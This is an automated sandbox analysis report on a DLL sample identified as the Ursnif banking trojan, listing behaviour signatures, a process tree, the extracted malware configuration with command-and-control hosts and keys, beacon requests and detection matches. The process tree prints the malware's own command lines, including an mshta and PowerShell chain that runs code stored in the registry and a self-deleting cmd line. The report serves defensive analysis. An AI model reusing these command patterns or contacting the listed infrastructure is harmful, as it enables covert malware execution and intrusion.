Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rXN8OIpbzz

Overview

General Information

Sample Name:rXN8OIpbzz (renamed file extension from none to dll)
Analysis ID:620156
MD5:6e21e2268df053e95557a2157ff33103
SHA1:efeefb5833b881475bd421da29719d578babb90c
SHA256:22a462b2da9c893b5f37dbbc19697d6aeaa28758c2338fca3a806e8d9d3ac483
Tags:dllgozi_ifsbursnif3000
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Writes to foreign memory regions
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6176 cmdline: loaddll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6200 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6240 cmdline: rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 3912 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 3516 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 5240 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Exhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Exhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6404 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5052 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3047.tmp" "c:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 4472 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7140 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4508.tmp" "c:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6964 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\rXN8OIpbzz.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6176 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.4c70000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.3.rundll32.exe.4b994a0.7.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.3.rundll32.exe.4b994a0.7.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  3.3.rundll32.exe.51c94a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.51f6b40.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:05/04/22-12:42:53.250349 05/04/22-12:42:53.250349
                      SID:2033203
                      Source Port:49820
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-12:42:52.800201 05/04/22-12:42:52.800201
                      SID:2033203
                      Source Port:49820
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-12:42:53.707282 05/04/22-12:42:53.707282
                      SID:2033203
                      Source Port:49820
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-12:42:32.722808 05/04/22-12:42:32.722808
                      SID:2033203
                      Source Port:49770
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: rXN8OIpbzz.dllReversingLabs: Detection: 40%
                      Machine Learning detection for sample
                      Source: rXN8OIpbzz.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C75FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                      Source: rXN8OIpbzz.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: tr0.Pdb source: csc.exe, 00000013.00000003.432123181.0000020BAB5E2000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000013.00000002.432715372.0000020BAB5E4000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000013.00000003.431620364.0000020BAB5DF000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000013.00000003.431571304.0000020BAB5D5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000013.00000003.431604960.0000020BAB5D9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.453885156.00000000060F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: rXN8OIpbzz.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.453885156.00000000060F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB65C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB99BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CCBAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CBFD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49770 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49820 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 185.189.151.28:80
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                      Source: global trafficHTTP traffic detected: GET /drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_2Fp_2B0K/lT2QuoqZm8BQycZwQ/H4nFd1cHmG_2/B8ivI_2F0O9/bJq8uYFSa5v9Ij/oSxEbcCz5_2FkNItSz7M7/RsUqbQcn0xtbFLfk/s_2BoKVrnDqJChc/UQqpJa6I6sYnVdkvyr/aVGGIz6zI/ZEQtOcGy53_2B5iYxze_/2BYqRtgImRp7tBA6q9P/SewC3o45SwnJ_2BNfdtGRr/1q9JxgDBH/3.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGmB/EVC7r5ALKWg/9SLUGnIzpxcWYM/xuMBfgGVcmtRuQEdnu_2F/z6aCj8Veiw_2FLpI/klXzvSCm2R4EgNj/tX1BLPzJEB4fd6nZGQ/ASaXUuL8G/Cb1hq1kHRkSzUSxa9avd/CLUWUoeV5nKWyDrb3Sa/Aw0B4o70zU_2B7Hjx9TwWi/5WU7_2FRUtVgO/Qd4d0Z1_2Bvo/b7ociWkm.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOfmJtH6P_2FDxg/fYP24ZJpA_2BXAD0LiynfR/sY7KfedmKK4eh/fSjWb6Xu/fAf6iEN7Rblzydam2OSbiSx/Vw6Cb_2Bbg/Vc9aYir_2By_2BYAt/7uRRpr7mVOmx/v_2F66pvHXt/nmtBefhmAX5DJk/ied6XVEApSsG8HlMS4KeZ/kP7pKEMCKNfzyZum/QUL8CnndyLC0Xcl/NmgSkYn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: rundll32.exe, 00000003.00000003.393829384.0000000002E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/
                      Source: rundll32.exe, 00000003.00000002.501364119.0000000002E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGm
                      Source: rundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOf
                      Source: rundll32.exe, 00000003.00000003.403377940.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393803385.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.403395449.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501364119.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393793161.0000000002E03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_2
                      Source: rundll32.exe, 00000003.00000003.393793161.0000000002E03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/sfsR2EvFJVPpjzK/_2F3BoHT0GZYMOPHQ3/2aosaOv_2/FvhUxykM9XmRrxizW8RT/
                      Source: rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: explorer.exe, 00000019.00000000.606043556.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.491143563.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.471987520.000000000D9F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                      Source: explorer.exe, 00000019.00000000.606043556.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.491143563.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.471987520.000000000D9F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C71CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                      Source: global trafficHTTP traffic detected: GET /drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_2Fp_2B0K/lT2QuoqZm8BQycZwQ/H4nFd1cHmG_2/B8ivI_2F0O9/bJq8uYFSa5v9Ij/oSxEbcCz5_2FkNItSz7M7/RsUqbQcn0xtbFLfk/s_2BoKVrnDqJChc/UQqpJa6I6sYnVdkvyr/aVGGIz6zI/ZEQtOcGy53_2B5iYxze_/2BYqRtgImRp7tBA6q9P/SewC3o45SwnJ_2BNfdtGRr/1q9JxgDBH/3.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGmB/EVC7r5ALKWg/9SLUGnIzpxcWYM/xuMBfgGVcmtRuQEdnu_2F/z6aCj8Veiw_2FLpI/klXzvSCm2R4EgNj/tX1BLPzJEB4fd6nZGQ/ASaXUuL8G/Cb1hq1kHRkSzUSxa9avd/CLUWUoeV5nKWyDrb3Sa/Aw0B4o70zU_2B7Hjx9TwWi/5WU7_2FRUtVgO/Qd4d0Z1_2Bvo/b7ociWkm.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOfmJtH6P_2FDxg/fYP24ZJpA_2BXAD0LiynfR/sY7KfedmKK4eh/fSjWb6Xu/fAf6iEN7Rblzydam2OSbiSx/Vw6Cb_2Bbg/Vc9aYir_2By_2BYAt/7uRRpr7mVOmx/v_2F66pvHXt/nmtBefhmAX5DJk/ied6XVEApSsG8HlMS4KeZ/kP7pKEMCKNfzyZum/QUL8CnndyLC0Xcl/NmgSkYn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
